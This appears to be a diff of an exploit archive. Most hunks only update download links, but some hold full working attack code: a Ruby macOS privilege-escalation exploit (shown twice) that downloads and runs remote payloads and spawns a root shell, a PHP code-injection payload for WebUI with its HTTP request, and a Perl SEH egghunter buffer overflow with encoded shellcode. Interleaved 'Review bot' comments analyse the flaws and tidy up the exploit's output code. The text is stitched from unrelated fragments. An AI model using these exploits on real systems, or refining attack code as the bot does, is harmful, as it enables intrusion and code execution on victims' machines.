"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
# milw0rm.com [2007-01-23]
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
# milw0rm.com [2007-01-23]


@ -16,4 +16,4 @@ step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~
Full Advisory: http://www.exploit-db.com/download_pdf/17307
Full Advisory: http://www.exploit-db.com/docs/17307.pdf

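--- /dev/null
+++ b/platforms/php/webapps/36821.txt
@@ -0,0 +1,34 @@
+#[+] Author: TUNISIAN CYBER
+#[+] Title: WebUI Remote Code Execution Vulnerability
+#[+] Date: 21-04-2015
+#[+] Vendor: https://github.com/baram01/webui/
+#[+] Type: WebAPP
+#[+] Tested on: KaliLinux (Debian)
+#[+] Twitter: @TCYB3R
+#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
+-------------------------------------------------------------------------------
+p0c:
+http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'
+Live HTTP Header:
+http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27
+GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
+Host: 192.168.186.129
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Wed, 22 Apr 2015 13:20:23 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.39-0+deb7u2
+Content-Encoding: gzip
+Vary: Accept-Encoding
+Content-Length: 51
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html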
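Review bot: The advisory never identifies the vulnerable sink in mainfile.php, and the payload shape on the p0c line, `Logon=';echo system('command');'`, is a single-quote break-out followed by PHP statements, so what is shown looks like PHP code injection (the `Logon` value reaching `eval()` or being written into a PHP file) rather than shell metacharacter injection; that distinction decides both the vendor fix and what a WAF or log rule should match on. The request uses throw-away credentials (`username=RCE&password=RCE`), so if the injection fires before the login check succeeds this is pre-authentication, which the text should state explicitly rather than leave to the reader. Only the response headers are shown (`Content-Length: 51`, gzip-encoded) and the sole proof is an external imgur screenshot; suggest pasting the decoded response body with the `id` output and adding the affected commit or version of https://github.com/baram01/webui/ so the issue can be reproduced and tracked.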

@ -1,4 +1,4 @@
// Compiled version: http://www.milw0rm.com/sploits/phpbbmemorydump.rar
// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/phpbbmemorydump.rar
// Source serv.cpp is at the bottom of the page - str0ke
// Notes from author:
@ -724,6 +724,6 @@ serveur::~serveur()
*/
// milw0rm.com [2004-12-17]
// milw0rm.com [2004-12-17]

@ -1,5 +1,5 @@
/* Paisterist's code was nice but heres mil's version.
* precompiled: http://www.milw0rm.com/sploits/897.rar
* precompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
@ -72,6 +72,6 @@ int main()
free (buffer);
return 0;
}
// milw0rm.com [2005-03-24]
}
// milw0rm.com [2005-03-24]

@ -72,7 +72,6 @@ Double Frees are usually exploitable but in this case it doesnt look simple. The
Proof of Concept:
http://www.exploit-db.com/application/15297
Vendor-Patch Status:

@ -16,7 +16,7 @@ http://www.whitecell.org/list.php?id=50
The shell code to acheive privilage esclation as per the article used the following steps
http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
http://www.exploit-db.com/docs/18712.pdf
.
1) Use PslookupProcessId get system token
@ -57,7 +57,7 @@ unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90";
/*
The shell code to acheive privilage esclation
Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
Add you shellcode here as per the article http://www.exploit-db.com/docs/18712.pdf
the malware used the following method.
1) Wse PslookupProcessId get system token

@ -1,4 +1,4 @@
Paper: http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf
Paper: http://www.exploit-db.com/docs/19527.pdf
Security Research - .Net Framework Tilde Character DoS

@ -8,4 +8,4 @@ Note: The impact of the unspecified vulnerability is not known. We will update t
Versions prior to Opera Web Browser 11.60 are vulnerable.
http://www.exploit-db.com/sploits/36443.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36443.zip

@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code.
===========
http://protekresearchlab.com/exploits/PRL-2015-04.docx
http://www.exploit-db.com/sploits/36788.docx
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36788.docx

@ -1,5 +1,4 @@
# Exploit Title: [Soritong v1.0 Universal BOF-SEH (META)]
# Software Link: #[http://www.exploit-db.com/downloads/a1def037869c831496bda3d81b0d06f5-soritong10.exe]
# Version: [V1.0]
# Tested on: [windows xp 2]

@ -79,5 +79,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
<http://www.exploit-db.com/application/11010>

@ -1,7 +1,6 @@
# Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Date: 4 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.exploit-db.com/application/10642/
# Version: 2.7.3.700
# Tested on: Windows XP SP 1
# CVE : N / A

@ -6,7 +6,6 @@
# Coded By: Dr_IDE
# Found By: abhishek lyall
# Usage: Load the evil .m3u file and click on it.
# Download: http://www.exploit-db.com/application/14612
# Tested On: Windows XPSP3
#
#################################################################

@ -7,7 +7,6 @@
# you on this one ! :)
# Grtz to dookie2000ca :)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir)
# Download: http://www.exploit-db.com/application/14517
# Platform: Windows XP SP3 En Professional - VirtualBox
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/

@ -5,7 +5,6 @@
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Download: http://www.exploit-db.com/application/14601/
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/

@ -1,7 +1,6 @@
# Exploit Title: AudioTran SafeSEH+SEHOP all-at-once attack method exploit
# Date: 2010.10.1
# Author: x90c
# Software Link: http://www.exploit-db.com/application/14961/
# Version: 1.4.2.4
# Tested on:
# - MS Win xp sp3 pro ko ( SafeSEH )

@ -3,7 +3,6 @@
#[+]Exploit Title: FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit
#[+]Date: 24\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.exploit-db.com/application/17441/
#[+]Version: 2.0.7
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A

@ -11,7 +11,7 @@
#It work reliably on IE9/FF4 and other browsers.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469
http://www.exploit-db.com/docs/17469.pdf
# me : twitter.com/ponez
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/

@ -13,7 +13,7 @@ Exploit
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
# http://www.exploit-db.com/download_pdf/17469
# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :

@ -3,7 +3,6 @@
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.exploit-db.com/application/15480/
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A

@ -41,4 +41,4 @@ Observed Result:
Authentication was successful as local system and a file written to the root of the C drive .
Proof of Concept:
http://www.exploit-db.com/sploits/36424.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36424.zip

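--- /dev/null
+++ b/platforms/windows/local/36822.pl
@@ -0,0 +1,135 @@
+#!/usr/bin/perl
+###########################################################################=
+#######################
+# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
+# Date: 2015-04-23
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software: Quick Search v1.1.0.189
+# Vendor Homepage: http://www.glarysoft.com/
+# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
+# Version: 1.1.0.189
+# Tested on: Windows XP SP2 EN
+# OSVDB-ID: 93445
+###########################################################################=
+#######################
+# Credits:
+# - Vulnerability identified by ariarat
+# http://www.exploit-db.com/exploits/25443/
+###########################################################################=
+#######################
+# Exploit development notes:
+# - instead of attaching the process, start the executable within the debugger
+# - the application's module gtms_D7.bpl was not compiled with SafeSEH
+# - since this is a unicode buffer overflow \x00 will not terminate the string
+# - 6 available unicode friendly P/P/R pointers within the module
+# - this exploit should work across different OS versions
+# (tested only on Win XP SP2 EN)
+# - several other unicode friendly aplication modules are available, but have not been checked
+###########################################################################=
+#######################
+# How to exploit:
+# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
+# (paste created exploit string into the search textbox)
+# - once the exploit string is pasted, the egghunter starts to search the memory for the marker
+# - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
+# - during the search the mouse cursor will NOT have a hourglass displayed beside it
+# - during the search the application will NOT become unresponsive (i.e. it will be usable)
+###########################################################################=
+#######################
+# Thanks to:
+# - ariarat (PoC)
+# - Peter Van Eeckhoutte (exploit development tutorials)
+# - Offensive Security (IT security courses, admin support)
+###########################################################################=
+#######################
+my $junk = "A" x 21;
+# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
+# msfencode -e x86/alpha_mixed
+# msfencode -e x86/unicode_upper BufferRegister=3DEAX
+# converted to ASCII
+my $egghunter =
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
+"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
+"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
+"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
+"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
+"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";
+my $fill = "C" x (1045 - length($junk.$egghunter));
+my $nextSEH = "\x41\x6d"; # INC ECX; INSW Yz DX
+my $SEH = "\x70\x34"; # POP POP RET from gtms_D7.bpl
+# jump to egghunter code
+my $allign = "\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x58"; # POP EAX
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x05\x01\x11"; # ADD EAX, 0x11000100
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+$allign = $allign."\x2d\x09\x11"; # SUB EAX, 0x11000900
+$allign = $allign."\x6d"; # NOP/remove NULL bytes
+my $jumptoegghunter = "\x50"; # PUSH EAX
+$jumptoegghunter = $jumptoegghunter."\x6d"; # NOP/remove NULL bytes
+$jumptoegghunter = $jumptoegghunter."\xc3"; # RETN
+# fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
+my $fill2 = "D" x 500;
+# allign EAX and jump to shellcode
+# (this gets executed after the marker is found)
+my $allign2 = "\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x57"; # PUSH EDI
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x58"; # POP EAX
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\xb9\x1b\xaa"; # MOV ECX, 0xaa001b00
+$allign2 = $allign2."\xe8"; # ADD AL,CH (equivalent to adding "1b" (from the previous command)
+# to the last two bytes of EAX; i.e. increase EAX with "1b")
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\x50"; # PUSH EAX
+$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
+$allign2 = $allign2."\xc3"; # RETN
+# msfpayload windows/messagebox
+# msfencode -e x86/alpha_mixed
+# msfencode -e x86/unicode_upper BufferRegister=3DEAX
+# converted to ASCII
+my $shellcode =
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
+"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
+"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
+"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
+"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
+"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
+"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
+"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
+"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
+"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
+"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
+"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
+"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
+"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
+"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
+"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
+"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
+"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
+"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
+"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
+"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
+"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
+"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
+"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
+"PPP0KPOBB3E0FQXOQOQAA";
+my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;
+open(myfile,'>QuickSearch_egghunter_messagebox.txt');
+print myfile $payload;
+close(myfile);
+print "Wrote ".length($payload)." bytes\n";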
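Review bot: The header and both encoder comments carry quoted-printable residue that was never decoded on import: the `#####...=` / `#######################` rule pairs are soft line breaks, `Full Mode ->=20` is a trailing space, and `BufferRegister=3DEAX` on both msfencode lines should read `msfencode -e x86/unicode_upper BufferRegister=EAX`, so the documented build command is wrong as written. All of that sits in comments, so the script still runs, but the output stage is unguarded: `open(myfile,'>...')` uses a bareword handle and silently continues if the file cannot be created, the handle is opened in text mode although `$payload` carries raw bytes such as `\xb9`, `\xaa`, `\xe8`, `\xc3` (no `\x0a` is present so nothing is corrupted today, but `binmode` is a cheap safeguard), and there is no `use strict; use warnings;`. The payload construction itself is left unchanged; only the four output lines are rewritten below.

```perl
# ... unchanged: $junk, $egghunter, $fill, SEH/alignment stubs, $shellcode, $payload ...
open(my $out, '>', 'QuickSearch_egghunter_messagebox.txt')
    or die "cannot create QuickSearch_egghunter_messagebox.txt: $!";
binmode($out);    # raw bytes, not text: keep every byte of the payload as-is
print $out $payload;
close($out) or die "close failed: $!";
print "Wrote ".length($payload)." bytes\n";
```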

@ -10,6 +10,6 @@
/// calc will not be run.
/////////////////////////////////////////////////////////////
http://www.milw0rm.com/sploits/2008-exploit_08021.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-exploit_08021.zip
// milw0rm.com [2008-04-14]

@ -1,7 +1,6 @@
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :

@ -1,7 +1,6 @@
# Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
# Date: 2010-09-15
# Author: Node
# Software Link: http://www.exploit-db.com/application/14941
# Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306)
# Tested on: Windows 7 x64 Eng
# CVE : -

@ -265,6 +265,6 @@ return;
}
}
// milw0rm.com [2004-02-27]
// milw0rm.com [2004-02-27]

@ -1,6 +1,6 @@
Source: https://github.com/SecurityObscurity/cve-2015-0313
PoC: http://www.exploit-db.com/sploits/36491.zip
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36491.zip
Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit

@ -6,4 +6,4 @@ Successful attacks will allow attackers to execute arbitrary code within the con
ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36542.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36542.zip

@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to execute arbitrary code
GreenBrowser 6.0.1002 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36546.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36546.rar

@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !
http://www.milw0rm.com/sploits/skinhead.rar (171 Ko)
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/skinhead.rar (171 Ko)
index.html

@ -1,5 +1,5 @@
<!--
1) wget http://www.milw0rm.com/sploits/05072005.js
1) wget https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/05072005.js
2) change src= below
3) edit index and change tftp location
@ -11,7 +11,7 @@
<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">
<script language="javascript" src="http://www.milw0rm.com/sploits/05072005.js"></script></head>
<script language="javascript" src="https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/05072005.js"></script></head>
<body>
@ -59,6 +59,6 @@ function loader() {
</script>
<script language="javascript">postamble();</script>
</body></html>
# milw0rm.com [2005-05-07]
</body></html>
# milw0rm.com [2005-05-07]

@ -1,5 +1,5 @@
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19525.zip
Paper: http://www.exploit-db.com/download_pdf/19527
Paper: http://www.exploit-db.com/docs/19527.pdf
Security Research - IIS Short File/Folder Name Disclosure